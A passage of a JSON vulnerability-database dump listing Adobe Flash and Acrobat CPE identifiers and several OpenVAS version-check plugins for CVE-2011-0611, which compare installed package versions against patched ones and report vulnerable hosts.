"cpe:2.3:a:adobe:acrobat:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.32.18:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.53.64:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.2.154.25:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.12.36:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.35.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.45.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.155.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.95.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.152.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.60.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.283.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.92.8:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.63:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.48.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.45.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.31.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.42.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-12-12T11:19:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "description": "Check for the Version of flash-player", "modified": "2017-12-08T00:00:00", "published": "2011-04-22T00:00:00", "id": "OPENVAS:850162", "href": "http://plugins.openvas.org/nasl.php?oid=850162", "type": "openvas", "title": "SuSE Update for flash-player SUSE-SA:2011:018", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for flash-player SUSE-SA:2011:018\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, 
http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"remote code execution\";\ntag_affected = \"flash-player on openSUSE 11.2, openSUSE 11.3\";\ntag_insight = \"Specially crafted Flash files as delivered by web sites\n or as .swf-files could exploit the flash player to execute arbitrary code\n with the privileges of the user viewing these files.\n CVE-2011-0611 has been assigned to this issue.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_id(850162);\n script_version(\"$Revision: 8041 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 08:28:21 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-04-22 16:44:44 +0200 (Fri, 22 Apr 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2011-018\");\n script_cve_id(\"CVE-2011-0611\");\n script_name(\"SuSE Update for flash-player SUSE-SA:2011:018\");\n\n script_summary(\"Check for the Version of flash-player\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"SuSE 
Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.2.159.1~0.2.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.2.159.1~0.2.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-31T18:42:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2011-04-22T00:00:00", "id": "OPENVAS:1361412562310850162", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850162", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SA:2011:018)", "sourceData": "# Copyright (C) 2011 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute 
it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850162\");\n script_version(\"2020-01-31T08:40:24+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:40:24 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-04-22 16:44:44 +0200 (Fri, 22 Apr 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"SUSE-SA\", value:\"2011-018\");\n script_cve_id(\"CVE-2011-0611\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SA:2011:018)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSE11\\.2|openSUSE11\\.3)\");\n\n script_tag(name:\"impact\", value:\"remote code execution\");\n\n script_tag(name:\"affected\", value:\"flash-player on openSUSE 11.2, openSUSE 11.3\");\n\n script_tag(name:\"insight\", value:\"Specially crafted Flash files as delivered by web 
sites\n or as .swf-files could exploit the flash player to execute arbitrary code\n with the privileges of the user viewing these files.\n CVE-2011-0611 has been assigned to this issue.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.2.159.1~0.2.1\", rls:\"openSUSE11.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSE11.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.2.159.1~0.2.1\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-27T19:22:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "description": "This host has Adobe flash Player installed, and is prone to code\nexecution vulnerability.", "modified": "2020-04-23T00:00:00", "published": "2011-04-22T00:00:00", "id": "OPENVAS:1361412562310801922", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801922", "type": "openvas", "title": "Adobe Flash Player Arbitrary Code Execution Vulnerability (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Arbitrary Code Execution 
Vulnerability (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801922\");\n script_version(\"2020-04-23T08:43:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 08:43:39 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-04-22 16:38:12 +0200 (Fri, 22 Apr 2011)\");\n script_cve_id(\"CVE-2011-0611\");\n script_bugtraq_id(47314);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Flash Player Arbitrary Code Execution Vulnerability (Linux)\");\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/230057\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa11-02.html\");\n script_xref(name:\"URL\", value:\"http://blogs.adobe.com/psirt/2011/04/security-advisory-for-adobe-flash-player-adobe-reader-and-acrobat-apsa11-02.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"General\");\n 
script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to corrupt memory\nand execute arbitrary code on the system with elevated privileges.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 10.2.153.1 and prior on Linux\");\n script_tag(name:\"insight\", value:\"The flaw is due to an error in handling 'SWF' file in adobe flash\nplayer, which allows attackers to execute arbitrary code or cause a denial\nof service via crafted flash content.\");\n script_tag(name:\"solution\", value:\"Upgrade adobe flash player to version 10.2.159.1 or later,\nUpdate Adobe Reader/Acrobat to version 9.4.4 or 10.0.3 or later.\");\n script_tag(name:\"summary\", value:\"This host has Adobe flash Player installed, and is prone to code\nexecution vulnerability.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nflashVer = get_kb_item(\"AdobeFlashPlayer/Linux/Ver\");\nflashVer = ereg_replace(pattern:\",\", string:flashVer, replace: \".\");\nif(flashVer)\n{\n if(version_is_less_equal(version:flashVer, test_version:\"10.2.153.1\")){\n report = report_fixed_ver(installed_version:flashVer, vulnerable_range:\"Less than or equal to 10.2.153.1\");\n security_message(port: 0, data: report);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-02T15:55:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "description": "This host has Adobe Acrobat or Adobe Reader or Adobe Flash Player installed\n and is prone to a code execution vulnerability.", "modified": "2020-05-28T00:00:00", "published": "2011-04-22T00:00:00", "id": "OPENVAS:1361412562310801921", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801921", "type": "openvas", "title": "Adobe 
Products Arbitrary Code Execution Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Products Arbitrary Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801921\");\n script_version(\"2020-05-28T14:41:23+0000\");\n script_cve_id(\"CVE-2011-0611\");\n script_bugtraq_id(47314);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-28 14:41:23 +0000 (Thu, 28 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-04-22 16:38:12 +0200 (Fri, 22 Apr 2011)\");\n script_name(\"Adobe Products Arbitrary Code Execution Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host has Adobe Acrobat or Adobe Reader or Adobe flash Player installed\n and is prone to code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the 
target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error in handling 'SWF' file in adobe flash player and\n 'Authplay.dll' in Adobe acrobat/reader. which allows attackers to execute\n arbitrary code or cause a denial of service via crafted flash content.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to corrupt memory and execute\n arbitrary code on the system with elevated privileges.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 10.2.153.1 and prior on Windows.\n\n Adobe Reader/Acrobat version 9.x to 9.4.3 and 10.x to 10.0.2 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade adobe flash player to version 10.2.159.1 or later,\n Update Adobe Reader/Acrobat to version 9.4.4 or 10.0.3 or later.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/230057\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa11-02.html\");\n script_xref(name:\"URL\", value:\"http://blogs.adobe.com/psirt/2011/04/security-advisory-for-adobe-flash-player-adobe-reader-and-acrobat-apsa11-02.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\", \"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader_or_Acrobat/Win/Installed\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ncpe_list = make_list(\"cpe:/a:adobe:acrobat_reader\",\n \"cpe:/a:adobe:acrobat\",\n \"cpe:/a:adobe:flash_player\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\ncpe = infos[\"cpe\"];\n\nif(cpe == 
\"cpe:/a:adobe:acrobat_reader\" || cpe == \"cpe:/a:adobe:acrobat\") {\n if(version_in_range(version:vers, test_version:\"9.0\", test_version2:\"9.4.3\") ||\n version_in_range(version:vers, test_version:\"10.0\", test_version2:\"10.0.2\")){\n report = report_fixed_ver(installed_version:vers, fixed_version:\"9.4.4 or 10.0.3\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n }\n} else if(cpe == \"cpe:/a:adobe:flash_player\") {\n if(version_is_less_equal(version:vers, test_version:\"10.2.153.1\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"10.2.159.1\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:13:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-02-25T00:00:00", "published": "2011-05-12T00:00:00", "id": "OPENVAS:69593", "href": "http://plugins.openvas.org/nasl.php?oid=69593", "type": "openvas", "title": "FreeBSD Ports: linux-flashplugin", "sourceData": "#\n#VID 32b05547-6913-11e0-bdc4-001b2134ef46\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 32b05547-6913-11e0-bdc4-001b2134ef46\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n linux-flashplugin\n linux-f10-flashplugin\n\nCVE-2011-0611\nAdobe Flash Player before 10.2.154.27 on Windows, Mac OS X, Linux, and\nSolaris and 10.2.156.12 and earlier on Android; Adobe AIR before\n2.6.19140; and Authplay.dll (aka AuthPlayLib.bundle) in Adobe Reader\n9.x before 9.4.4 and 10.x through 10.0.1 on Windows, Adobe Reader 9.x\nbefore 9.4.4 and 10.x before 10.0.3 on Mac OS X, and Adobe Acrobat 9.x\nbefore 9.4.4 and 10.x before 10.0.3 on Windows and Mac OS X allow\nremote attackers to execute arbitrary code or cause a denial of\nservice (application crash) via crafted Flash content; as demonstrated\nby a Microsoft Office document with an embedded .swf file that has a\nsize inconsistency in a 'group of included constants,' object type\nconfusion, ActionScript that adds custom functions to prototypes, and\nDate objects; and as exploited in the wild in April 2011.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware 
upgrades.\n\nhttp://www.adobe.com/support/security/advisories/apsa11-02.html\nhttp://www.vuxml.org/freebsd/32b05547-6913-11e0-bdc4-001b2134ef46.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(69593);\n script_version(\"$Revision: 5424 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-25 17:52:36 +0100 (Sat, 25 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-12 19:21:50 +0200 (Thu, 12 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0611\");\n script_name(\"FreeBSD Ports: linux-flashplugin\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"linux-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.0r289\")<=0) {\n txt += 'Package linux-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-f10-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"10.2r159.1\")<0) {\n txt += 'Package linux-f10-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if 
(__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "modified": "2019-03-12T00:00:00", "published": "2011-05-12T00:00:00", "id": "OPENVAS:136141256231069593", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231069593", "type": "openvas", "title": "FreeBSD Ports: linux-flashplugin", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_linux-flashplugin14.nasl 14117 2019-03-12 14:02:42Z cfischer $\n#\n# Auto generated from VID 32b05547-6913-11e0-bdc4-001b2134ef46\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.69593\");\n script_version(\"$Revision: 14117 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 15:02:42 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-12 19:21:50 +0200 (Thu, 12 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0611\");\n script_name(\"FreeBSD Ports: linux-flashplugin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following packages are affected:\n\n linux-flashplugin\n\n linux-f10-flashplugin\n\nCVE-2011-0611\nAdobe Flash Player before 10.2.154.27 on Windows, Mac OS X, Linux, and\nSolaris and 10.2.156.12 and earlier on Android, Adobe AIR before\n2.6.19140, and Authplay.dll (aka AuthPlayLib.bundle) in Adobe Reader\n9.x before 9.4.4 and 10.x through 10.0.1 on Windows, Adobe Reader 9.x\nbefore 9.4.4 and 10.x before 10.0.3 on Mac OS X, and Adobe Acrobat 9.x\nbefore 9.4.4 and 10.x before 10.0.3 on Windows and Mac OS X allow\nremote attackers to execute arbitrary code or cause a denial of\nservice (application crash) via crafted Flash content as demonstrated\nby a Microsoft Office document with an embedded .swf file that has a\nsize inconsistency in a 'group of included constants, 
' object type\nconfusion, ActionScript that adds custom functions to prototypes, and\nDate objects and as exploited in the wild in April 2011.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa11-02.html\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/32b05547-6913-11e0-bdc4-001b2134ef46.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"linux-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.0r289\")<=0) {\n txt += 'Package linux-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"linux-f10-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"10.2r159.1\")<0) {\n txt += 'Package linux-f10-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2428", "CVE-2011-2444", "CVE-2011-2416", "CVE-2011-0622", "CVE-2011-0626", "CVE-2011-0627", "CVE-2011-0619", "CVE-2011-2140", "CVE-2011-0623", "CVE-2011-0609", "CVE-2011-2424", "CVE-2011-0625", "CVE-2011-2134", "CVE-2011-2138", "CVE-2011-0628", "CVE-2011-2139", "CVE-2011-0572", "CVE-2011-0573", "CVE-2011-2429", "CVE-2011-0558", "CVE-2011-0608", "CVE-2011-0574", "CVE-2011-2425", "CVE-2011-2110", "CVE-2011-0560", "CVE-2011-0577", 
"CVE-2011-2414", "CVE-2011-0611", "CVE-2011-0618", "CVE-2011-0561", "CVE-2011-2130", "CVE-2011-2137", "CVE-2011-0578", "CVE-2011-2417", "CVE-2011-2135", "CVE-2011-0579", "CVE-2011-2125", "CVE-2011-0571", "CVE-2011-2426", "CVE-2011-0575", "CVE-2011-2107", "CVE-2011-0559", "CVE-2011-2136", "CVE-2011-0624", "CVE-2011-0607", "CVE-2011-2415", "CVE-2011-0589", "CVE-2011-0621", "CVE-2011-2427", "CVE-2011-2430", "CVE-2011-0620"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201110-11.", "modified": "2017-07-07T00:00:00", "published": "2012-02-12T00:00:00", "id": "OPENVAS:70774", "href": "http://plugins.openvas.org/nasl.php?oid=70774", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201110-11 (Adobe Flash Player)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
